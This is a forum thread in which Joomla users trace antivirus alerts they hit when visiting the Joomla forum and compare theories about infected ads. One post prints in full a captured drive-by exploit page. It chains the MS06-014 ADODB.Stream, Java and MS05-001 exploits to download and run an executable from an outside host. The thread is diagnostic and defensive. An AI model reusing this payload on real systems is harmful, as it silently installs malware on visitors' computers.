VBS/Psyme When Entering Joomla Forum

[BillyS]

McAfee virus scanner picked up this yesterday when I visited this site:

An item was detected and removed the script from running on your computer:

VBS/Psyme

I wasn't sure why that happened, so I had McAfee scan the entire computer and I ran Ad Aware and Spybot.  This particular combination never failed me before.  Everything was clean.

I came back tonight and got the same message. Anyone else picking this up?

Basically, I went to Google, typed in Joomla then clicked on Forum.  (<-- Yes, I know this is a lazy way)

[PhilD]

Well no, I was on quite a bit tonight.  I tried your method of getting to the forum, (sometimes I am lazy also) and no problem.  The only problem I have seen today with the Joomla site is the help site, there are database errors and you can't get to any of the FAQ's. I think someone already made not of it though.

You probably already read this but the McAfee website says this about VBS/Psyme  The link is to the full page is : http://vil.nai.com/vil/content/v_100749.htm

The Method of Infection -

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email, etc.

[anto.buitrago]

I think there was a problem in Joomla Forum... maybe hacked???  it was down for several minutes yesterday.

When I visited this site, I saw that Firefox was trying to open an url from "superadultsex.net"... then... Firefox hung

I would like to read any comment from Joomla moderators/experts about this topic... we can be talking about a security bug in Joomla

Regards

[BillyS]

>>When I visited this site, I saw that Firefox was trying to open an url from "superadultsex.net"... then... Firefox hung

I can't say that I was also redirected to this same website, but I do know when I was hitting the back button on my browser after getting this warning (to see if I could replicate the problem) I was seeing a URL for a similar site (although I could not get there).  It looks like my browser was trying to be redirected somehow but it wasn't working.

[Johan]

Hi

Me to has been warned by two different antivirussoftware (Norton and Avast) from different computers when enetering http://forum.joomla.org

Avast Log:

Code: Select all

2007-12-21 19:23:48   SYSTEM   1648   Sign of "Java:ClassLoader-D [Trj]" has been found in "http://xxxxxx.xxx/los/java.php\Dex.class" file.  

Regards

[novemike]

me too, from Antivir...

[mijji]

I can confirm this, it only happens when entering forum.joomla.org, and I have noticed this for at least the past two weeks.

[Johan]

Some moderator or admin should look into this and please give a reply to this post a.s.a.p. This send no good feelings to the comunity...

This is a similar topic at this board.!! Trojan Downloader

By the way,

Mary Christmas to u all

[Tonie]

Moving to Sites & Infrastructure forum.

[brad]

I'm keen to help guys, but I have been unable to replicate this myself. Can you find anything in the page source?

[restorator]

Happened to me just a few minutes ago. I clicked the link to "beginners guide to joomla" in my website admin panel (which takes me to this forum) and my avg went of with a js/Psyme virus warning. it would not let me "heal" but let it "send to vault" and then I deleted it. I am running a scan on my computer now. Must be an exploit via a forum post or something.

[brad]

What was the exact link/post that you were taken to?

[restorator]

I only remember seeing forum.joomla.org dont remember the rest of the link as IE locked up on me when avg went off with the warning. I had to ctrl alt del out of IE. But is was definately this domain that showed in the address bar.

[PhilD]

I  want to say that I don't doubt that some members are having problems so please don't think this is any kind of attack on anyone who says there is a problem.

For the record, I am not having any problems nor can I figure a way to create any.

If there is a problem then I think there is going to be a need to give more information, such as what browser you were using,  how you accessed the forum or help, what version of Joomla your using, etc.,  in order that the problem may be replicated.
I realize that when something unexpected happens, you don't always remember full details, but more information in this case might help.

Something like what is listed below:

I am using the following setup on my computer when I access the forum and help center:
Firefox version 2.0.0.11
Norton Internet Security 10.0.3.3 Latest definitions as of today.
A full scan of the computer was done at 5 am this morning. No problems were found.
I am using Joomla 1.0.12 on one site and 1.0.13 on the other two sites.
default Joomla .htaccess file used on all sites. - no problems.

I access the forum and help site through the following ways:

From an emailed forum response to my posting link. -- no problems.
By following the link that I have in my bookmarks to the Joomla main site, then selecting Forum or Help from the menu to get to the forum or the help site. -- no problems
By typing Joomla into Google and then following the link to the forum. - no problems
By typing Joomla into Google and then following the link to Joomla, then clicking on  - no problems.

I just tried access to the help site from the Joomla admin screen/help. This took me to the correct Joomla Help -- No problems.

Once in the forums I generally move around to various boards by following the forum links, either from the site itself or through a link in a post that interests me this includes opening extra tabs when I want-- No problems

I also received a message from one of the people (Phil Taylor) that developed a component I use today that says in part "the modules provided by mosDirectory v2.3.2 are vulnerable to a remote file inclusion" and suggesting an upgrade to latest version (2.4.0) as it was possible fot the injection to happen. Although he had no reports of it happening, all previous versions were affected. The default .htaccess file that ships with Joomla when enabled will prevent the injection. I can supply the complete email to anyone who wants it.

I have noticed several things with restorator's posts (I'm not picking on you either by the way).  He used IE to access his websites admin area, while there he clicked on Help, then selected "beginners guide to Joomla" His antivirus and IE went nuts when he did that.

I can not find ""beginners guide to Joomla" in my help section anywhere, at least not in the 1.0.12 version I checked. The help section is the default setup Joomla did when I installed the site. I have not changed it.

Could there be a possibility, that some users sites are having an exploit done to their sites and the actual exploit is happening from their end?

[brad]

I've checked and rechecked this forum and am not able to locate and malicious code. As I posted above, if anyone else has further information, please let me know.

[mijji]

Specs:
IE6.0
McAfee VirusScan Enterprise + Anti-Spyware ver. 8.0i. Latest update: Dec 19
I currently don't run any Joomla Websites, and I don't have any Joomla-related files on my computer (it's a laptop at work)

Access have been by manually typing forum.joomla.org in IE, and then selecting IE's suggestion.

In total I have encountered this problem 3-4 times for the past two weeks. It only happens on forum.joomla.org, not on any other site, and it hasn't been every time I visit forum.joomla.org.

I will get hold of a page source if I get this problem again.

PhilD -> I, for one, don't read you posting as knocking on anybody, your points are valid, and I will try and get hold of more information if I encounter the problem again. Actually I'm just happy that this problem get some kind of attention, although it is difficult to replicate, because it may be a safety concern.

[brad]

Interesting: http://www.news.com.au/technology/story ... 11,00.html

Maybe that is what some saw?

[BillyS]

I started this thread and I have not been able to replicate the problem myself since that time.  I know it happened twice - and on two different days.  I can still see the events in McAfee.  I did look through the code very quickly the second time it happened and I did not see anything that looked unusual.

I heard about the Google problem and I was wondering if that was it too.

[PhilD]

Interesting reading.

For those interested here is the link to the BitDefender report with detail
[url=http://www.bitdefender.com/VIRUS-1000239-en--Trojan.Qhost.WU.html]http://www.bitdefender.com/VIRUS-1000239-en--Trojan.Qhost.WU.html
[/url]
Appears to affect Googles AdSense by placing a redirect in a users computers hosts file when they click on a infected ad on google or a regular website with Google AdSense ads.

You can check your hosts file by running this ping command from the command line in windows:

To check if you are affected, you should issue the following command (from the command line or from Start -> Run):

ping -t pagead2.googlesyndication.com

(use ctrl break to stop the ping or ctrl c to stop the ping and exit

The response should look similar to this:

Pinging pagead.l.google.com [6x.xxx.xxx.xxx] with 32 bytes of data:

where the x's represent digits. If you are not infected, the first digit will be a 6 (as in the example). If you are infected, the first digit will be a 9.

I think that google may have changed server ip addresses as I was getting 74.125.47.164 returned on the ping which is in a google server range of 74.125.0.0 - 74.125.255.255 according to a whois result.

You can check your hosts file for a redirect by opening the windows host file located in
C:\WINDOWS\system32\drivers\etc in a text editor.

If you see entries that you or Spybot S&D did not put there such as:

... ebay.com

Where ... is some set of four numbers, you should probably REMOVE this entry as spyware is trying to redirect your access from ebay.com to another website. The same would go for being redirected to any site from your hosts file, if it looks fishy then get rid of it.

A visual inspection on my hosts file showed just the localhost line.

Please make a backup of your hosts file before trying to edit it.

Spybot S&D if you use that can also lock your hosts file and if it is locked you may not be able to edit it until you unlock it.

This information was gathered from a number of sources and from my own computer. Your mileage may vary.

Sources of information:
Google search
http://www.news.com.au/technology/story/0,25642,22959118-5014111,00.html (News.com.au)
http://www.webpronews.com/topnews/2007/12/19/trojaned-google-ads-attacked (Web Pro News)
[url=http://www.bitdefender.com/VIRUS-1000239-en--Trojan.Qhost.WU.html[/urll] (BitDefender)
[url]http://whois.domaintools.com/74.125.47.165]http://www.bitdefender.com/VIRUS-1000239-en--Trojan.Qhost.WU.html[/urll] (BitDefender)
http://whois.domaintools.com/74.125.47.165 (Whois result for ip address returned by ping on my computer)
Windows path to hosts file C:\WINDOWS\system32\drivers\etc (Looked up on my computer Win XP system, may be different location on other versions of windows)


mijji, I just thought my previous posting came across a little rough in tone and did not want it taken the wrong way by anyone.

[eddy666]

This happened 2 times to me today from 2 different computers. It happened upon entering the forum root of the site. I was thinking in an advertising maybe but there seems to be none on the site  

[PhilD]

I don't think it necessarily has anything to do with the Joomla site, or the Joomla forum other than the fact that the sites may use some of Googles products for ads and stats.  From the research I gathered, it is a Google compromise, is considered a low threat and was designed to take ad money away from Google. I suspect it may also affect Google analytics in some way (have no proof) which I think the forum and Joomla site may use for stats.  Google places many ads on their search results pages. Some you may not even realize are ads, but think are search results (I'm not talking about the right side which are obvious ads). Many other websites you may visit may have the trojan embedded in an ad and not know it. Clicking on any of the ads either on the Google site or another website can apparently infect your computers hosts file. You may not know if you were infected if you were infected before your anti-virus program was updated to identify and catch the trojan.  Once infected, your computer will always try to connect to the rogue site. anytime there is a trigger present (something that google handles) on a web page you are viewing.

I would suggest you ask Google, how this was allowed to happen, and what they are going to do about it, how they are going to prevent this in the future, and what they are going to do about customers, and visitors who were infected.

[Johan]

Hi 

I will come back with a deeper report of what’s happened to me and if it's happens again. Browser, OS, time, and so on will follow.

About the Google thing I'm not shore what to say to Google about this.
I'm running my Joomla site with Google Adsence and the I think It's my own responsibility since I'm the one displaying Google Adsence. If this Google thing gets confirmed then I will save my users from Malware by removing Google Adsence? Non of my users (3000) reported any similar happening there.

It's always a big problem finding the fault when it occurs randomly. Thanks for looking in to this since it only occurred (for me) when surfing forum.joomla.org



//johan

[restorator]

I just wanted to add that this has not yet happened again yet, and the link I followed to "beginners guide" is not after clicking help in 1.0 but within the main administration page of 1.5 rc4 there is a link to "beginners guide".
I am playing with joomla 1.5 rc4 on a site that is not yet live (and on an intranet not visible to the world) on my home computer so i really doubt that i have been hacked into. Also the computer is a fresh install of windows and a wamp server and joomla within the past two days. So its highly unlikely (although not impossible) that it is anything on my computer.

I would hazard a guess that the "virus" is a particular banner ad that comes up during every so many rotaions that is using a script to download the trojan. Pretty simple idea and a nightmare for an admin to track down to find which one out of tons in the rotation that is linking to an external site AND executing a script. Would not be very hard to do for anyone with only a basic knowledge of html to do. Can you strip any javascripts from any banners to stop this kind of thing, assuming thats the problem?


P.S.
I am playing with Joomla as it has some nice tempates available. I was always a fan of Postnuke but the templates easily available are horrible and the backwards compatibility is an issue, not to mention the next release seems to be eons away and will likely break modules again. I fear the postnuke may be a dying thing so I am looking to the more current popular options. But security as well as varied user permissions are some of my requirements. SO this episode is not helping my decision as we can not yet be sure if its a joomla problem, a bbs problem (which there are always tons of issues with) or an a banner problem. I will contrib what I can to help ya, but thats all the info I have at this time.

[mgnapg]

PLEASE CHECK FORUM SECURITY BECOUSE IFRAME TROJAN IS LOADED WITH FORUM LOAD!

[Tonie]

Please see this.

[mgnapg]

Thanks!  ;)

The pages which normally contain advertisement from Google either don't display the advertisement or display advertisement from an other source (not Google)
The "hosts" file used to provide a local storage for domain name / IP mappings contains a line redirecting the host "page2.googlesyndication.com"

To check if you are affected, you should issue the following command (from the command line or from Start -> Run):

ping -t pagead2.googlesyndication.com

The response should look similar to this:

Pinging pagead.l.google.com [6x.xxx.xxx.xxx] with 32 bytes of data:

where the x's represent digits. If you are not infected, the first digit will be a 6 (as in the example). If you are infected, the first digit will be a 9.

[erdsiger]

Moderator note: Topic moved from 1.5 General Question to Sites & Infrastructure.

[Satsh]

Hi there,

sad to pick this topic up again, but it happened to me several times now, that I get bombed by trojans when entering the forum. I tried to analyse it a bit.

This is the code, which seems to be hidden somewhere on the page:




Sadly I haven't been able to locate it yet, only seems to happen sometimes. Might be that it comes from the googleads - i can't say for sure.

Other malicious code is loaded from:

http://void.theoron.com/setup.php?aff_id=5068&type=1

I can't say for sure yet if the iframe above load that page, but it happens at the same time.

The code it loads is quite hazardous and tries to exploit a common windows security problem (ADODB Stream Hack):

Code: Select all

<HTML xmlns:IE>
<HEAD>
         <STYLE type='text/css'>
            IE\:clientCaps {behavior:url(#default#clientcaps)}
         </STYLE>
</HEAD>
<IE:clientCaps ID="oClientCaps" /> 
<script type="text/javascript" language="JavaScript">

function GetVersion(CLSID)
{
   if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")){return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
    else {return Array(0,0,0,0);}
}

function Get_Win_Version(IE_vers)
{
 if (IE_vers.indexOf('Windows 95') != -1) return "95"
 else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
 else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
 else if (IE_vers.indexOf('Windows 98') != -1) return "98"
 else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
 else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
 else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}


function MS06014CreateO(o, n) {
   var r = null;
   try { eval('r = o.CreateObject(n)') }catch(e){}
   if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){}}
   if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
   if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
   if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
   if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}}
   return(r);   
}

function MS06014Go(a) {
   var s = MS06014CreateO(a, "WScript.Shell");
   var o = MS06014CreateO(a, "ADODB.Stream");
   var e = s.Environment("Process");
   var url = 'http://void.theoreon.com/exe.php?ex=5068';
   var xml = null;
   var bin = e.Item("TEMP") + "mbroit.exe";
   var dat; 
   try { xml=new XMLHttpRequest(); }
   catch(e) {
      try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
      catch(e) {
         xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
      }
   }
   if (! xml) return(0);
   xml.open("GET", url, false)
   xml.send(null);
   dat = xml.responseBody;
   o.Type = 1;
   o.Mode = 3;
   o.Open();
   o.Write(dat);
   o.SaveToFile(bin, 2);
   s.Run(bin,0);
}

function MS06014Exploit() {
   var i = 0;
   var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
   
   while (t[i]) {
      var a = null;
      
      if (t[i].substring(0,1) == '{') {
         a = document.createElement("object");
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
      } else {
         try { a = new ActiveXObject(t[i]); } catch(e){}
      }
      
      if (a) {
         try {      
            var b = MS06014CreateO(a, "WScript.Shell");
            if (b) {
               MS06014Go(a);
               return(1);
            }
         } catch(e){}
      }
      i++;
   }
   return(0);
}
function pass2()
{
    try {
   var unsafeclass = document.maniman.getClass().forName("sun.misc.Unsafe");
   var unsafemeth = unsafeclass.getMethod("getUnsafe", null);
   var unsafe = unsafemeth.invoke(unsafemeth, null);
   document.maniman.foobar(unsafe);
   var chenref = unsafe.defineClass("omfg", document.maniman.luokka, 0, document.maniman.classSize);
   var chen = unsafe.allocateInstance(chenref);
   chen.setURLdl("http://void.theoreon.com/exe.php?ex=5068");
   chen.setUname("558");
   chen.setCID("other");
   return chen.perse(unsafe);
    } catch (d) {return -1;}
    return -1;
}

function pass3(){
    document.write("<applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT>");
    document.write("<param name=usid value=us0105>");
    document.write("<param name=linkurl value="http://void.theoreon.com/exe.php?ex=5068"></applet>");
    return 1;
}

function Negcash(){
document.write("<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>");
if (pass2() != 1) {
   pass3();
}

}

function ExploitMS03011(){
document.write("<applet archive="ms03011.jar" code="MagicApplet.class" width=1  height=1>");
document.write("<param name="ModulePath" value="http://void.theoreon.com/exe.php?ex=5068"></applet>");
}

function MS05001Exploit()   {
document.write("<OBJECT id="hhctrl_HTML_Opener" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"> <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"><PARAM name="Item1" value="command;ms-its:addremov.chm::/win_addprog_window_component.htm"></OBJECT>");
document.write("<textarea id="ObjMaker" cols=10 rows=10 style="display:none"><OBJECT id="hhctrl_JS_Runner" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"></textarea>");
document.write("<OBJECT id="DHTML_Edit" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width=10 height=10 align="middle"><PARAM NAME="ActivateApplets" VALUE="1"><PARAM NAME="ActivateActiveXControls" VALUE="1"></OBJECT> ");
document.write("<DIV id="ObjectContainer"></DIV>");

HTA_URL="http://void.theoreon.com/";
var Obj_body=document.all.ObjMaker.innerText;
HTA_location='",ms'+'hta,'+HTA_URL+'exp/ms05001.hta'+'"';
Init_HTA='var alink=document.links[0].href%3Baparams=alink.split(" ")%3Bchmpath=aparams[0].split(",")%3Bnlink=chmpath[0]+'+HTA_location+'+" "+aparams[1]+" "+aparams[2]+" "+aparams[3]%3Bdocument.links[0].href=nlink%3Bdocument.links[0].click();';
Obj_Last_Param="\r\n\<PARAM name="Item1" value='command;javascript:"+Init_HTA+"'>";
document.all.ObjMaker.innerText=Obj_body+Obj_Last_Param+'</OBJECT>'; 
ObjectContainer.innerHTML=document.all.ObjMaker.value;
hhctrl_HTML_Opener.HHClick(); 
setTimeout("hhctrl_JS_Runner.HHClick()",500); 
setTimeout("self.focus()",1000);
}

function ExploitAll(){

if (navigator.appName=="Microsoft Internet Explorer")
{

   var IEversion=navigator.appVersion;
   var IEplatform=navigator.platform;
   if (IEplatform.search("Win32") != -1)
   {
      var WinOS=Get_Win_Version(IEversion);
      FullVersion=clientInformation.appMinorVersion;
      PatchList=FullVersion.split(";");
        
      var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); 
 
      var XP_SP2_patched=0;
  
      if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
      {  
         ExploitMS03011();
      }
      if(MS06014Exploit() != 1){
         Negcash();
         for (var i=0; i < PatchList.length; i++){
            if (PatchList[i]=="SP2"){
               XP_SP2_patched=1; 
            }
         }
         if(XP_SP2_patched==0){
            MS05001Exploit();
         }
      }
    }
}
else if (navigator.appName=="Netscape")
{
    j=navigator.userAgent.indexOf('Firefox');
    if (j != -1)
    {
       j=j+"Firefox/".length;
       var FF_name=navigator.userAgent.substr(j);
       k=FF_name.indexOf(" ");
       if (k != -1)
       {
          FF_name=FF_name.substr(0,k); 
       }
       FF_vers=FF_name.split(".");
       if (FF_vers[2] == undefined)
       {
          FF_vers[2]=0;
       }     
       if (FF_vers[0]==0){
           window.location="http://void.theoreon.com/exp/mfsa200550.php";
       }else if (FF_vers[0] == 1){
          if ((FF_vers[1]==0)&&(FF_vers[2]<5)) {
             window.location="http://void.theoreon.com/exp/mfsa200550.php";
          }else{
             window.location="http://void.theoreon.com/exp/ms06006.php";
          }
       }
    }
} 
}
</script>
<body onload='ExploitAll()'>
</BODY>
</HTML>

It then tries to fire up "Microsoft Remote Data Remote Services" Active-X Control.

I'm currently tempted to fire up a VM and let it run to see what happens ;-)

I'm getting those 3 hits from AntiVir when it happens:

First: HEURISTIC/Exploit.HTML
Then: HEURISTIC/Malware
Last: HTML/ADODB.Exploit.Gen

I'll try to give a another shot later to find the pattern when it comes up and when not. But it's quite sure, that it only happens to me on the joomla forum site and _nowhere_ else. And every mother and her son is using google ads nowadays, so it makes me crincle my nose to blame it on google.

I'll be back with some more info soon I hope.

S

[pe7er]

[MOD note: topics merged]

[paulgr]

Just got another trojan -- definitely off this forum -- had one last week as well -- Was accessing Joomla! 1.5 >> General Questions section using IE6.
AVG warning then "Windows cannot access .//..//xXx.exe..."
Found xXx.exe (file size 3.88Kb) dropped into my user folder, AVG calls it "Trojan horse Agent.LES"
Couldn't find anything in the page source that looked unusual, it appears to be a random occurrence to stop it being traced easily.
Next time it happens I will keep all my cache source and try to work out where it's coming from.

Paul